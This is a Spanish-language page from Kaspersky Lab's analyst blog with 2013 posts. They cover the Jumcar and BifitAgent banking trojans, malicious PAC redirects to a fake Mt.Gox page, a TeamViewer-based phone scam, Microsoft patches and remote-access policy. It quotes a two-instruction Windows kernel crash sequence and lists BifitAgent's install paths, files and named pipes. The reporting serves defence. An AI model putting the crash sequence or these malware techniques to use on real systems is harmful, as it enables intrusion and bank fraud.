RSS | Foro | Encuestas | Mapa de nuestro sitio




Todas las amenazas

Virus

Hackers

Spam
Todo el sitio    Sólo virus
  
Enciclopedia de virus
Alertas
Análisis
Noticias
Glosario
Bitácora

 
Archivo

<< 2013  
ene feb mar
abr may  
     
     
Sobre los autores de la bitácora del analista antivirus
About Diary's Authors

La bitácora del analista antivirus es un weblog mantenido por los analistas antivirus de Kaspersky Lab, encabezado por Eugene Kaspersky. Lea más sobre los autores de esta bitácora

 		 

  Home / Bitácora

Bitácora del analista antivirus

Jumcar. Desde Perú para Latinoamérica (Primera parte)


  Jorge Mieres       22 mayo 2013 | 14:39  MSK

Comentar  

Jumcar” es el nombre que le hemos asignado a una familia de códigos maliciosos desarrollados en Latinoamérica (especialmente en Perú) y que, según nuestra investigación, ha estado realizando maniobras de ataque desde marzo de 2012.

Después de seis meses de investigación, podemos finalmente detallar las características específicas de Jumcar. Las iremos publicando en los próximos días. Esencialmente, el propósito principal de este programa malicioso es robar los datos financieros de los clientes latinoamericanos de los principales bancos que utilizan los servicios de banca online. El 90% de estos se llevan a cabo en Perú a través de estrategias phishing basadas en la clonación de los sitios web de seis bancos.

Algunas variantes de la familia Juncar también apuntan a dos grandes bancos de Chile y a otro de Costa Rica.


Porcentaje de ataques phishing por país

Sabemos que en Latinoamérica la cultura cibercriminal se está expandiendo a pasos agigantados.Esto se ha puesto en evidencia por algunas redes zombi manejadas mediante programas crimeware desarrollados en la región, y que también tienen la habilidad de generar programas maliciosos personalizados.Las redes zombi que hemos descubierto en los dos últimos años tienen esta habilidad y hemos advertido al respecto varias veces. Entre ellas están vOlk-Botnet, UELP, Chimba-Botnet, AlbaBotnet y PiceBOT.

Sin embargo, la familia Jumcar de programas maliciosos tiene características completamente nuevas y componentes muy particulares en comparación con los mencionados previamente.Comparten el mismo objetivo: robar datos financieros; y una estrategia de infección inicial en común: mensajes de correo asociados con una sólida ingeniería social visual en falsos mensajes.
Desde una perspectiva técnica, por el momento todas las variaciones de esta familia de programas maliciosos se desarrollan en .NET, mientras que el patrón común de los programas maliciosos desarrollados en Latinoamérica (excepto Brasil) es desarrollarlos en VisualBasic.

Asimismo, y al contrario de patrones comunes de los programas maliciosos en Latinoamérica que suelen ofuscar parte de sus códigos con sencillas conversiones hexadecimales, todas las variantes de Jumcar usan algoritmos codificadores simétricos y asimétricos para ocultar la funcionalidad especificada en el código fuente. Para ello, este programa malicioso usa las siguientes clases: System.Security.Cryptography.TripleDES,System.Security.Cryptography.AesySystem.Security.Cryptography.RSA.
Las siguientes imágenes muestran la diferencia en la ofuscación de programas maliciosos empleada en las redes zombi más populares de la región, en comparación a la ofuscación empleada en Juncar.


Ejemplo de la conversión hexadecimal en la configuración de parámetros del código malicioso propagado mediante S.A.P.Z, vOlk-Botnet, PiceBOT y AlbaBotnet


Parámetros de configuración del programa malicioso Jumcar codificado con RSA

Los patrones que distinguen a esta familia de programas maliciosos son:


  • Las campañas de propagación e infección siempre se realizan mediante correo.

  • La estrategia de ingeniería social se basa en la imagen de Facebook en el mensaje de correo y en el nombre del archivo descargado (por ejemplo: facebook.exe). También en mensajes de correo enviados supuestamente por bancos peruanos.

  • El tamaño de las variantes no sobrepasa los 44kB.

  • Los iconos usados también se relacionan con Facebook en un 80% de los casos; el otro 20% se refiere a iconos de una compañía telefónica, y un 1% al icono nativo de los lenguajes de programación .NET y VB. Es decir, 8 de cada 10 muestras usa Facebook como imagen de icono.



Iconos usados en las diferentes variantes de Jumcar


  • Después de que el sistema ase infecta, el programa malicioso se autorenombra usando nombres relacionados con Microsoft Windows (por ejemplo: Windows Defender.exe).

  • Los parámetros dinámicos del programa malicioso están codificados con algoritmos AES, 3DES y RSA.

  • Las primeras variantes generaban una llave en el registro de Windows para automatizar el inicio, pero ha dejado de ser así, limitándose a un "ataque fantasma" mediante pharming. A diferencia de otros programas maliciosos, no carga un proceso malicioso ni se autoelimina. Sólo modifica el archivo hosts. De esta manera, no quedan archivos maliciosos en el ordenador, pero el usuario seguirá siendo víctima de un ataque phishing cada vez que visite el sitio web del banco debido a la modificación del archivo hosts.

  • El lenguaje de programación usado para crear Jumcar es .NET sin comprimir.

  • El programa malicioso crea una carpeta y un archivo específico, en la misma carpeta, con extensión XLSX o DOCX.

  • Todos los sitios web usados para las campañas se infectan con alguna vulnerabilidad, y los atacantes los usan para guardar el archivo pharming, un propagador de mensajes y un troyano puerta trasera.

  • El principal objetivo es la comunidad peruana.


Las campañas de propagación son compatibles con las clásicas estrategias visuales de ingeniería social que se basan en el envío de mensajes de correo fraudulentos, para lo cual recurren a dos canales de ataques:

  1. Un mensaje supuestamente enviado por Facebook con el asunto “Facebook Message” (o similar), con el logotipo de la red social, que desvía el tráfico al archivo llamado “Mensaje_Facebook_Privado.php” (o similar), que contienen las instrucciones necesarias para descargar la variante de Jumcar.

  2. Un mensaje supuestamente enviado por un importante banco del Perú que desvía el tráfico al clon de su sitio web. Este es el clásico ataque phishing.


Mensaje malicioso distribuido en mensajes de correo. Es una de las estrategias más comunes que usa Jumcar

Todas las variantes de Jumcar se alojan en sitios web previamente infectados. En otras palabras, el atacante no registra los nombres de dominio como parte de la estrategia de propagación.

También implanta un paquete phishing que se usa para robar los datos de sus víctimas. Esto incluye un archivo de texto simple con la configuración para el archivo hosts en el ordenador de cada una de las víctimas, el propagador de mensajes de correo usado para enviar cantidades masivas de mensajes engañosos, y un troyano puerta trasera que le permite al atacante acceder y cargar nuevas variantes del programa malicioso.

Jumcar ha tenido un impacto significativo en los últimos meses y se ha concentrado en la región. En el siguiente gráfico podemos ver claramente que los niveles de infección, en rojo, han tenido mucho éxito en Perú y Chile:


Perú y Chile son los países con los índices más elevados de la infección por Jumcar


Hemos analizado más de 50 muestras de la familia Jumcar. Esto nos ha permitido recopilar un gran volumen de datos interesantes que compartiremos en los próximos días.

Kaspersky Lab detecta las diferentes variantes como “Trojan.Win32.Jumcar” y “Trojan.MSIL.Jumcar”.

NoSuchCon 2013


  Stefano Ortolani       20 mayo 2013 | 17:23  MSK

Comentar  
Alentar el intercambio de conocimientos entre diferentes generaciones de investigadores de seguridad es quizás uno de los mejores aspectos de una buena conferencia de seguridad. Al ver a los asistentes, NoSuchCon puede considerarse, sin duda, una de ellas. Es raro ver una mezcla de jóvenes investigadores y viejos gurús que intercambien ideas y se acerquen para conocerse. Organizada en París este año, NoSuchCon se lleva a cabo en las instalaciones de Espace Oscar Niemeyer, lo cual es un bonito intento de combinar una conferencia de seguridad en un centro de exposiciones artísticas (felicitaciones a los organizadores ).




Espace Oscar Niemeyer

Sin embargo, como profesionales de seguridad, nuestra atención se concentra en la calidad de las presentaciones. Sin duda, NoSuchCon está ofreciendo un muy buen nivel. Desde el primer día hasta ahora me han parecido muy buenas la charla principal y las charlas técnicas. La charla principal se concentró en presentar opiniones (a veces duras) sobre temas de actualidad, mientras que las charlas técnicas mostraron temas técnicos y hacks (muy) impresionantes. Veamos algunos ejemplos de ambas (para los más interesados, cada juego de dispositivas está disponible aquí, justo antes de comenzar mi relato).



Charla principal

La conferencia se inauguró con la charla principal a cargo de Andrea Barisani. La presentación se enfocó en un sencillo concepto: la investigación en seguridad se ha convertido en un tema delicado. Lo que Andrea quiso decir es que los investigadores deberían sentir la responsabilidad de difundir apropiadamente los resultados de sus investigaciones que tanto les costó alcanzar. Por ejemplo, definir la razón de que se llevara a cabo una investigación puede ser muy importante para evitar malos entendidos con el público. Asimismo, de alguna manera deberían publicarse los intentos fallidos de investigaciones a fin de compartir con colegas investigadores las lecciones aprendidas en el proceso. Por desgracia, como se señaló, esto casi nunca sucede.

Las charlas técnicas se iniciaron por la mañana con Mateusz "j00ru" Jurczyk como primer orador. El título de la charla, Abuso del kernel de Windows: Como colapsar un sistema operativo con dos instrucciones, se explica muy bien por sí mismo (para los curiosos, aquí se las damos: xor ebp, ebp; jmp 0x8327d1b7; básicamente, se engaña muy fácilmente al gestor de fallas de la página haciéndole creer que el registro ebp engañado es un conductor a la pila del kernel cuando el registro eip se configura con algunos valores mágicos; tengamos en cuenta que cualquier acceso no válido a la memoria inevitablemente lleva a una verificación de errores). Lo que el título no aclara lo suficiente es que sólo se trataba de un ejemplo de los muchos casos (como la implementación de memcpy, tal y como señaló el ponente) que a menudo los profesionales en seguridad no someten a pruebas porque los consideran los suficientemente estudiados y adecuadamente analizados en busca de errores.




Abuso del kernel de Windows

Por la tarde le tocó el turno a Alex Ionescu, reconocido coautor de biblias de sistemas operativos como Windows Internals. Su intervención fue un recuento de SMC (System Management Controller), un componente estándar de nuestros queridos MACs. Este chip se usa para controlar todo tipo de cosas, como un sensor de luz, un acelerómetro, voltajes, etc. Sin embargo, como cualquier otro controlador, tiene su lógica guardada en algún sitio, una ROM, cuyo descubrimiento sin duda conduciría a otros más interesantes (recordemos que el SMC también se usa para guardar, entre otras cosas, contraseñas para FileVault). Resulta muy interesante que la ROM sea actualizable pero que no se la pueda leer con la misma facilidad. La charla siguió develando muchos detalles de la arquitectura y lógica subyacentes (el SMC también incluye un refinado cronómetro programable que se puede configurar para ejecutar acciones específicas, como reiniciar el sistema en determinados momentos). Lo curioso es que: algunas rutas de códigos se ejecutan sólo cuando se usa Specialis Revelio como cadena de entrada (clara referencia a la saga de Harry Potter; con razón el título de la charla era “Ninjas y Harry Potter”). Por desgracia, todo este firmware sigue siendo un misterio, ya que sólo se ha develado un 30% (¿quizás sepamos más para la próxima conferencia?).

Por lo que he visto hasta ahora, puedo decir que le segundo día se muestra tan promisorio como el primero, pero eso es todo por ahora desde París. ¡Seguidme para más actualizaciones y manteneos seguros!

PACs y Bitcoins maliciosos


  Fabio       20 mayo 2013 | 17:15  MSK

Comentar  
Resuklta que ahora los ciberdelincuentes en Brasil también se interesan por la moneda virtual Bitcoin. Para unirse a la horda de phishers en su acoso a la moneda virtual, han aplicado su mejor técnica maliciosa: PACs maliciosos en ataques por Internet, y dominios phishing.

El uso malicioso de PAC (Proxy Auto-Config) entre los black hats brasileños no resulta novedoso (lo sabemos desde 2007). Por lo general, este tipo de scripts maliciosos se usan para desviar la conexión de las víctimas hacia páginas phishing de bancos, tarjetas de crédito, etc. Hemos descrito al detalle estos ataques aquí: Característica beneficiosa, uso malicioso. En 2012, un troyano banquero ruso llamado Capper también comenzó a usar la misma técnica. Es muy efectivo en ataques al paso.
Después de registrar el dominio java7update.com, los ciberdelincuentes brasileños lanzaron ataques contra varios sitios web, insertando un iframe malicioso en algunas páginas infectadas:

Este iframe carga un applet Java malicioso elaborado para cambiar la configuración del proxy en los navegadores IE y Firefox. La URL usada en el ataque apunta a un archivo llamado update.pac que luce así:

Para burlar la detección de firmas, el script usa múltiples concatenaciones. Después de limpiarlo, el script se ve así:

Notemos que entre los sitios de bancos y compañía de tarjetas de crédito brasileños que han sido atacados por este script malicioso, está el dominio mtgox.com, el mercado más popular de la moneda virtual bitcoin. También se observa un desvío al dominio mtgox.com.br que no existe en Brasil, pero sigue presentándose en los equipos infectados, por supuesto, apuntando a una página phishing:

En un ordenador limpio, el acceso al dominio mtgox.com.br muestra esta página:

El objetivo queda claro: desviar a las víctimas a una página fraudulenta de mtgox.com para robarles sus datos, y por supuesto, algunos bitcoins. This Esta es una de las páginas fraudulentas que se usó en el ataque.
A los visitantes regulares de mtgox.com les recomendamos activar la autenticación de dos factores en sus cuentas para evitar ser víctimas de este ataque.

Este PAC malicioso se detecta como Trojan.JS.Redirector.za.

Actualizaciones de Microsoft, mayo de 2013 - vulnerabilidades críticas de Internet Explorer, elevaciones de privilegio de kernel, y más


  Kurt Baumgartner       16 mayo 2013 | 12:56  MSK

Comentar  
Microsoft ha publicado una larga lista de actualizaciones para programas de Microsoft. Las más interesantes parecen ser las que parchan vulnerabilidades en Internet Explorer y kernel. En total, se parcharon 10 vulnerabilidades "use-after-free" en IE, además de una vulnerabilidad importante de Divulgación de Información y tres vulnerabilidades de elevación de privilegios. Casi en todos los casos, fueron los investigadores de seguridad externos que trabajaban con la Iniciativa del Día Cero de HP los que dieron la voz de alarma sobre las vulnerabilidades.

La reciente vulnerabilidad de día cero de Internet Explorer 8 que se implementó con ROP para que funcione en sistemas Windows 7 protegidos por ASLR, que se encontraba en el sitio web comprometido del Departamento de Trabajo y otros, se utilizó como parte de una operación de ataques dirigidos que se cree que estuvo a cargo del conocido hacker malicioso “DeepPanda”. Los investigadores de FireEye e iSight Partners fueron quienes informaron sobre esta vulnerabilidad de día cero de IE. El boletín de seguridad MS13-038 parcha esta amenaza. Puede que las otras no se estén explotando de forma muy activa, pero, como siempre, es muy importante que todos los usuarios de Internet Explorer actualicen sus sistemas lo antes posible para evitar convertirse en víctima de las operaciones de las cada vez más comunes explotaciones masivas con motivaciones financieras.

Un poco menos atractivo pero igual de importante es que las organizaciones parchen las tres vulnerabilidades “Importantes” de elevación de privilegios de kernel. Aunque parece que no se han explotado al público, las vulnerabilidades EoP están listas para explotaciones posteriores y son clave para infiltrar los sistemas. Los tres problemas fueron denunciados por investigadores de seguridad externos, a quienes Microsoft hizo llegar sus agradecimientos.

Las organizaciones también deben percatarse de que Http.sys en Windows 8, Windows RT y Windows 2012 es vulnerable a ataques de negación de servicio, pero parece que es muy complicado explotar esta vulnerabilidad. Por eso, se la ha calificado como "Importante".

También se están parchando con actualizaciones “Importantes” otras aplicaciones del lado del cliente, como Word y Publisher, entre otras. Puedes encontrar más información sobre todas estas actualizaciones en el resumen de Microsoft.

Adobe también publicó varias actualizaciones importantes para ColdFusion (teniendo en la mira a los atacantes persistentes que amenazan a organizaciones) y para sus dos grandes aplicaciones del lado del cliente: Flash y Reader/Acrobat.

Fraude de telecomunicaciones – una combinación de phishing y troyanos


  Dong Yan       14 mayo 2013 | 17:27  MSK

Comentar  
En China, el fraude de telecomunicaciones se está convirtiendo en un crimen cada vez más común. El año pasado se vieron más de 170.000 casos de fraude de telecomunicaciones que causaron pérdidas de más de 12,5 mil millones de dólares. Por lo general, los estafadores llaman a sus víctimas y las engañan para que transfieran su dinero a un grupo de cibercriminales mediante un cajero automático. Pero hace poco surgió una nueva clase de fraude de telecomunicaciones que combina sitios phishing y troyanos de puerta trasera.

La semana pasada, la policía del Departamento Dongcheng de la Oficina de Seguridad Pública de Beijing nos pidió que investigáramos un caso de fraude de telecomunicaciones. La víctima había perdido 100.000 dólares. Después de nuestra investigación, las tácticas de los estafadores quedaron al descubierto.

¿En qué consiste la estafa? ¿Cómo se engaña a la víctima?

Primero, recibes una llamada de un “fiscal público” que te acusa de estar involucrado en un crimen financiero y te dice que debes ayudar con la investigación. Tú, por supuesto, niegas ser parte del crimen, pero el "fiscal público" te aconseja que compruebes si estás en una lista de sospechosos de una base de datos oficial. Para hacerlo, debes ingresar al sitio web de la "Procuraduría Suprema" que, por supuesto, es un sitio phishing.

Después te piden que revises si estás en la lista de criminales de la “base de datos de crímenes financieros de Internet”. Esta base de datos, por supuesto, es confidencial y sólo se puede abrir si se ha descargado y ejecutado un "complemento":



Para ingresar a la “base de datos de crímenes financieros de Internet” tienes que descargar y ejecutar un “complemento”

El supuesto complemento es en realidad una versión personalizada de Teamviewer:

Cuando se ejecuta, la aplicación consigue el control absoluto de tu ordenador. Los criminales pueden usar tu equipo para cualquier operación, como si fuera suyo. Pero esto no es suficiente: aun no consiguen tu dinero. Entonces te indican cuál es el siguiente paso.

Mientras el “complemento” se está ejecutando, te piden que revises la base de datos. Para ello debes visitar una página web de investigación.



Visita la página web en la que puedes acceder a la base de datos de criminales

En esta página web, antes de entrar a la base de datos, debes escribir tu número de cuenta bancaria y contraseñas y, lo más importante, tu llave USB.

Puede no sonar extrano que debas escribir tus datos bancarios para ayudar a investigar un supuesto crimen financiero, pero todos esos datos llegan directo a las manos de los estafadores. Con los números de cuenta, contraseñas, llaves USB y el "complemento" de teamviewer, los cibercriminales ya tienen todo lo que necesitan para robarte.



Debes entregar la información de tu cuenta bancaria para consultar la base de datos de criminales.

Cuando pulsas en el botón de inicio, aparece una nueva página web que dice que la investigación está en proceso. Esta pantalla esconde el inicio de la transferencia de dinero de tus cuentas bancarias. Para evitar que interrumpas el robo, te advierten que no interfieras con la “investigación” porque podrías hacer que el sistema colapse y te acusarían de todavía más cargos criminales.

La transferencia de dinero se completa en sólo unos segundos. Cuando al fin te das cuenta de que fuiste víctima de una estafa, los cibercriminales ya están lejos de tu alcance.

Los casos de fraude de telecomunicaciones son muy difíciles de resolver. El dinero robado se divide de inmediato entre varias cuentas y se lava comprando varios bienes virtuales. Es casi imposible rastrear con exactitud dónde está el dinero. La llamada telefónica que inició toda la situación también es difícil de rastrear si el número está escondido. Por último, los cibercriminales suelen trabajar desde diferentes países, casi siempre lejos de la escena del crimen, por lo que es muy difícil que una agencia del orden público haga justicia por sí sola.

CeCOS VII


  Michael       29 abril 2013 | 14:57  MSK

Comentar  
La conferencia Counter eCrime Operations Summit VII (CeCOS VII) plantea interrogantes sobre desafíos operacionales y el desarrollo de recursos comunes para los primeros en responder a los ataques y los forenses profesionales que protegen a los consumidores y a las compañías contra las modernas amenazas cibernéticas.

Este acontecimiento anual organizado por la organización Anti-Phishing Working Group (APWG) se está llevando a cabo en Buenos Aires, Argentina.




Se discuten una variedad de temas, desde la ciberdelincuencia hasta las acciones preventivas. Es también una oportunidad para conocer a expertos de la industria, autoridades gubernamentales, académicos y otros.

Mi colega Jorge Mieres ofreció una charla llamada “Inteligencia informática aplicada a los códigos maliciosos” y se refirió a recientes sucesos relacionados con programas maliciosos.

Podemos ver la agenda de la conferencia aquí.

Además de las preocupaciones en el mundo digital, nos tocó vivir de cerca un caso similar de delincuencia en el mundo real: A un colega de Japón le robaron el teléfono celular de su bolsillo a plena luz del día y en una calle muy transitada, sin que se diera cuenta en absoluto.

¡Seamos precavidos!

Políticas de seguridad: programas de acceso remoto


  Kirill Kruglov       29 abril 2013 | 14:22  MSK

Comentar  

La experiencia de muchos responsables de seguridad informática muestra que solo un reducido número de incidentes de seguridad son resultado de ataques dirigidos sofisticados y meticulosamente planificados, y que la mayoría se deben a la falta de medidas efectivas de seguridad y control. Este articulo da inicio a una serie de publicaciones sobre amenazas a la seguridad informática asociadas con el uso de software legítimo.

TeamViewer

Muy populares, fáciles de usar y prácticas, las herramientas de acceso remoto son muy apreciadas tanto por los administradores de sistemas como por los desarrolladores, y por cualquiera que en algún momento haya necesitado ingresar a un ordenador en su oficina desde un lugar remoto, ya sea durante un viaje de negocios, trabajando desde casa, o en caso de una emergencia en plenas vacaciones. Sin embargo, el uso irrestricto de este software significa una amenaza contra la seguridad corporativa y puede ocasionar incidentes de seguridad.

Por ejemplo, TeamViewer, una herramienta de acceso remoto relativamente popular, se usó para espiar en Europa del Este. Sin embargo, el uso de software de acceso remoto para penetrar una red corporativa constituye en potencia más que una amenaza externa (implica acciones ciberdelictivas y programas maliciosos). Cada bit de una amenaza interna es significativo: los empleados corporativos pueden potencialmente abusar el acceso remoto con el software instalado y usado por un infiltrado con propósitos ilegítimos.

Echemos un vistazo a algunas de las amenazas potenciales con un estudio de caso de la vida real realizado por los expertos de Kaspersky Lab.

Estudio de caso. Una historia de la vida real

En una compañía grande de software, un empleado se quedaba a trabajar varias horas fuera de su horario habitual. Solía ir a la oficina los fines de semana para cumplir con sus trabajos pendientes. Cansado de esta agotadora rutina, hizo caso al consejo de sus colegas y se instaló TeamViewer. Ahora ya no tenía que trabajar horas extra en la oficina ni ir los fines de semana: podía hacerlo desde su casa, gracias al acceso remoto a su ordenador en su oficina.

TeamViewer le facilito la vida, pero le complicaba el trabajo al responsable de seguridad informática de la compañía, quien al poco tiempo observo que ocurrían más incidentes en la red corporativa: la solución antivirus comenzó a detectar más programas maliciosos, intentos más frecuentes para acceder sin autorización a datos confidenciales, etc. Un somero análisis revelo que la mayor parte de las acciones maliciosas estaban relacionadas con el ordenador de un determinado usuario.

Un análisis más profundo realizado en el equipo sospechoso no revelo ningún programa malicioso. El responsable de seguridad sospecho que quizás algún colega hubiese accedido a la cuenta del empleado y la usara para ocultar sus actividades delictivas. Sin embargo, cuando analizo los datos del portal de acceso y la vigilancia CCTV, descubrió que nadie había estado en la oficina en los momentos en que se llevaban a cabo las acciones maliciosas. Existía otra posibilidad: la existencia de un troyano puerta trasera en el equipo afectado. Un análisis del tráfico de red arrojo que los incidentes de seguridad ocurrían al mismo tiempo que los aumentos de actividades de red en el mismo equipo. Aunque el tráfico a través de los puertos 80 y 443 estaba codificado, se estableció que el trafico malicioso se comunicaba con servidores con dominios como ‘serverXXX.teamviewer.com’.

Un examen del equipo sospechoso mostro que un servidor TeamViewer se ejecuta en el equipo. El responsable de seguridad entrevisto al empleado y se enteró sobre el acceso remoto a la red corporativa, pero el empleado aseguro que no estaba conectado a la red corporativa cuando sucedían los incidentes de seguridad.

Una inspección del ordenador domestico del empleado mostro que hace algún tiempo se había detectado y eliminado un programa spyware. El empleado no le había dado mucha importancia ya que su solución de seguridad había neutralizado con éxito la amenaza. Otro análisis en profundidad demostró que este programa spyware estaba diseñado para registrar la información que se generaba en el teclado, y que capturaba áreas de la pantalla.

El responsable de seguridad concluyo que un programa spyware instalado en el ordenador domestico del empleado había transmitido al ciberdelincuente los datos necesarios para acceder al equipo en la oficina.

Con esta información, el ciberdelincuente accedió a la red corporativa, la analizo, instalo programas maliciosos, busco vulnerabilidades e intento copiar archivos desde los recursos de la red.

Afortunadamente, estas actividades maliciosas se neutralizaron rápidamente gracias a las acciones del equipo de seguridad informática, por lo que el daño causado por el ciberdelincuente fue limitado. Al empleado se le llamo la atención, y el jefe de seguridad tomo medidas rápidas para prevenir que incidentes similares ocurriesen en el futuro.

Solución

Un paso importante al procesar los incidentes de seguridad consiste en corregir los defectos en las políticas de seguridad corporativa que dan lugar a posibles incidentes. Entonces, ¿que es lo que un responsable de seguridad debe hacer en este caso?

Análisis primario

Cuando se detecta un incidente de seguridad, la primera tarea de un responsable de seguridad informática es averiguar si se trata de un incidente aislado, o si potencialmente podría repetirse en otros equipos de la red. Un inventario de programas permite al responsable recopilar información sobre todos los programas instalados en los ordenadores de los usuarios, mientras que el monitoreo de programas le ayudara a determinar la frecuencia con que se usan. Un análisis preliminar le proporciona, entre otras cosas, un cuadro general sobre cómo se usan en la red los programas de acceso remoto, quien los usa, y con qué frecuencia.

Control del tráfico en la red

Un control inadecuado de las conexiones que se realizan en la red corporativa es una fuente de incidentes de seguridad. La herramienta más apropiada para controlar las conexiones de red es un cortafuegos, así como los es IPS para controlar el tráfico en la red. Sin embargo, aunque las herramientas que controlan el perímetro de la red corporativa son importantes, su efecto es limitado en un caso como el que acabamos de describir. Un cliente TeamViewer estableció una conexión con otro a través de servidores remotos, mientras que los datos en forma de paquetes codificados HTTP pueden comunicarse mediante los puertos 80 y 443. No es factible bloquear este tráfico ya que esto provocaría la paralización total de la red. Por otra parte, el bloqueo de las conexiones a todos los dominios o direcciones IP de los servidores TeamViewer significa mucho trabajo, ya que se deben identificar todos los nombres de dominios y direcciones IP relacionados, y estas listas se deben mantener actualizadas.

Control de aplicaciones

El control de aplicaciones es evidentemente una herramienta apropiada para disminuir el riesgo de penetraciones en una red corporativa mediante TeamViewer, ya que puede detener el uso descontrolado.

El control de aplicaciones le permite al responsable de seguridad informática atender dos problemas:

  1. El control del uso de TeamViewer.

TeamViewer es una herramienta conveniente. Por ejemplo, le permite al administrador de sistemas prestar asistencia a los usuarios desde cualquier lugar. El uso de TeamViewer (o una alternativa segura) puede permitirse a los usuarios que realmente necesiten el acceso remoto a su red corporativa. Para los otros empleados, no debe permitirse el acceso remoto.

Esta decisión parece compleja: la búsqueda, compilación y mantenimiento de una lista completa y actualizada de todos los programas de acceso remoto consume tiempo y esfuerzo. Sin embargo, el uso del control de aplicaciones en Default Deny mode resuelve el problema de mantener y actualizar listas de programas no autorizados.

Cuando se resuelve el asunto de quien no necesita TeamViewer, la tarea del responsable de seguridad informática se simplifica al control de un determinado grupo de empleados que están en la zona de riesgo.

  1. Restringir acceso a TeamViewer y sus capacidades, para reducir la posibilidad de que los ciberdelincuentes penetren la red corporativa.

Supongamos que un empleado tiene la autorización y permiso para usar TeamViewer, pero que un ciberdelincuente logra robárselos. ¿Como se puede minimizarse el daño potencial?

Aparte de bloquear ciertas actividades, el control de aplicaciones le permite al responsable de seguridad restringir las capacidades de la aplicación con la aplicación de las políticas HIPS, como la restricción a los recursos de la red, la restricción de privilegios para ejecutar y/o cargar aplicaciones, desactivar cualquier cambio en las configuraciones, etc. Esto ayuda a limitar las capacidades de TeamViewer en caso de que caiga en manos de un ciberdelincuente.

Políticas de seguridad:

Aunque Teamviewer posee una amplia lista de capacidades funcionales, no incluye herramientas para que el administrador ejerza un control centralizado en una red corporativa. Algunas configuraciones en TeamViewer que ayudan a reducir el riesgo de penetraciones son: la generación de una nueva contraseña de conexión cuando se ejecuta TeamViewer, la opción de limitar la lista de ID de clientes a los que se permite conectarse, y el establecimiento de una conexión VPN entre dos clientes TeamViewer. Sin embargo, es el usuario quien decide si se usan o no determinadas restricciones. Por supuesto que el administrador puede instalar y configurar TeamViewer, y protegerlo con una contraseña para evitar cambios en su configuración. Sin embargo, no tiene sentido imponer un control sobre las modificaciones a la configuración, ya que los usuarios pueden recurrir a una versión portátil y liviana en un dispositivo USB.

Todos los empleados deben estar conscientes de las políticas corporativas de seguridad. Una de las tareas del responsable de seguridad informática consiste en informar a los empleados sobre la seguridad con regularidad y asegurarse de que se estén cumpliendo las políticas vigentes. Por ejemplo, los usuarios deberían:

  • Ejecutar TeamViewer con un mínimo de autorizaciones, sin posibilidad alguna de que aumenten;
  • Generar una nueva llave con cada ejecución;
  • Usar TeamViewer solo cuando sea necesario y no dejarlo en funcionamiento si no se usa;
  • No guardar autorizaciones de conexión ni pasarlas a otros en forma descodificada;
  • Informar inmediatamente al departamento de seguridad informática si se sospecha de un ciberataque.

Conclusión

Desde el punto de vista de la seguridad informática, los programas de acceso remoto comprometen la seguridad del perímetro de la red corporativa. Este es el caso cuando estos programas se usan sin control, y cuando se omiten las regulaciones de seguridad al conectarse a la red corporativa desde el exterior. Las actividades de estos programas en la red complican mucho la identificación de actividades maliciosas entre las actividades legítimas. La detección del uso programas de acceso remoto sin previa autorización del departamento de seguridad informática debe considerarse como evidencia suficiente de penetración de un ciberdelincuente.

Para minimizar los riesgos de estos incidentes de seguridad, se debe restringir en lo posible el uso de programas de acceso remoto, lo cual se logra con la ayuda del control de aplicaciones. Cuando los empleados realmente tienen que usar estos programas por razones empresariales, se deben tomar todas las precauciones para minimizar el riesgo de ciberataques. El establecimiento de políticas HIP, la ejecución con autorizaciones mínimas, y la autorización obligatoria de dominios, preferiblemente en dos etapas, ayudan a disminuir a un nivel aceptable los riesgos derivados de los programas potencialmente peligrosos.

Dinero, municiones y dos troyanos codiciosos, segunda parte


  Serguey Golovanov       25 abril 2013 | 15:34  MSK

Comentar  
Han pasado tres años desde que Dinero, municiones y dos troyanos codiciosos: Robo de bancos en el siglo XXI se publicara en esta bitácora. El artículo describe el primer programa malicioso diseñado para atacar a usuarios de un software para banca online desarrollado por la compañía BIFIT. Ahora existen varios programas maliciosos con similar funcionalidad, entre ellos:

  • Trojan-Spy.Win32.Lurk
  • Trojan-Banker.Win32.iBank
  • Trojan-Banker.Win32.Oris
  • Trojan-Spy.Win32.Carberp
  • Trojan-Banker.Win32.BifiBank
  • Trojan-Banker.Win32.BifitAgent

Aunque su funcionalidad ya no es única, el último programa de la lista llamó nuestra atención.


Palabras e hilos usados por Trojan-Banker.Win32.BifitAgent

Este particular programa malicioso posee varias características que lo distinguen de sus similares.
Arquitectura
Este programa malicioso ejecuta dos módulos principales en el equipo capturado: un archivo ejecutable y un archivo comprimido JAVA. Mientras se instala, crea la carpeta C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\APPLICATION DATA\BIFIT_A, en la que se copian los siguientes archivos:


  1. AGENT.EXE v, el principal módulo ejecutable responsable de las comunicaciones con el servidor de comando. Este módulo es capaz de autoactualizarse, gestionar procesos, ejecutar comandos mediante CMD.exe, y descargar y ejecutar cualquier archivo, siempre obedeciendo los comandos provenientes del servidor de comando.
  2. ALL.POLICY v, un archivo de configuración JAVA que elimina cualquier restricción de seguridad relacionada con JAVA.
  3. BIFIT_A.CFG v, el archivo de configuración de los programas maliciosos que incluye el número de identificación de los sistemas infectados y las direcciones de los servidores de comando.
  4. BIFIT_AGENT.JAR v, un archivo comprimido JAVA que contiene el código para interactuar con los sistemas de BIFIT.
  5. JAVASSIST.JAR v, un archivo comprimido JAVA y que incluye las funciones adicionales que requiere BIFIT_AGENT.JAR.


Fragmento del codigo deTrojan-Banker.Win32.BifitAgent responsable de la instalacion y autoejecucion de los modulos en un sistema infectado

En el transcurso de su funcionamiento, este programa malicioso también crea varios “pipes” con nombres.

  1. \\.\\pipe\10c86ecd42 v, para identificación.
  2. \\.\\pipe\10c86ecd51 v, para registrar sus propias acciones.
  3. \\.\\pipe\10c86ecd52 v, para comunicarse con BIFIT_AGENT.JAR.

Como resultado, durante el funcionamiento del programa malicioso, el principal módulo ejecutable, que es el responsable de la comunicación con el servidor de comando, funciona de forma simultánea con los archivos maliciosos JAR, lo que permite a los atacantes modificar de forma instantánea cualquier código que se ejecute con JAVA mientras se llevan a cabo las transacciones bancarias.

BIFIT_AGENT.JAR

Por defecto, BIFIT_AGENT.JAR, que contiene el código que permite interactuar con los sistemas BIFIT, queda profusamente ofuscado y todas las clases que contiene se fragmentan en 156 archivos divididos aleatoriamente en subcarpetas.


Ejemplo de contenidos ofuscados de BIFIT_AGENT.JAR v

La ofuscación dificulta aún más el análisis de los archivos que interactúan con los sistemas BIFIT, aunque es posible reconstruir las acciones del programa malicioso ya que el archivo posee amplias capacidades relacionadas con el registro de sus propias acciones.


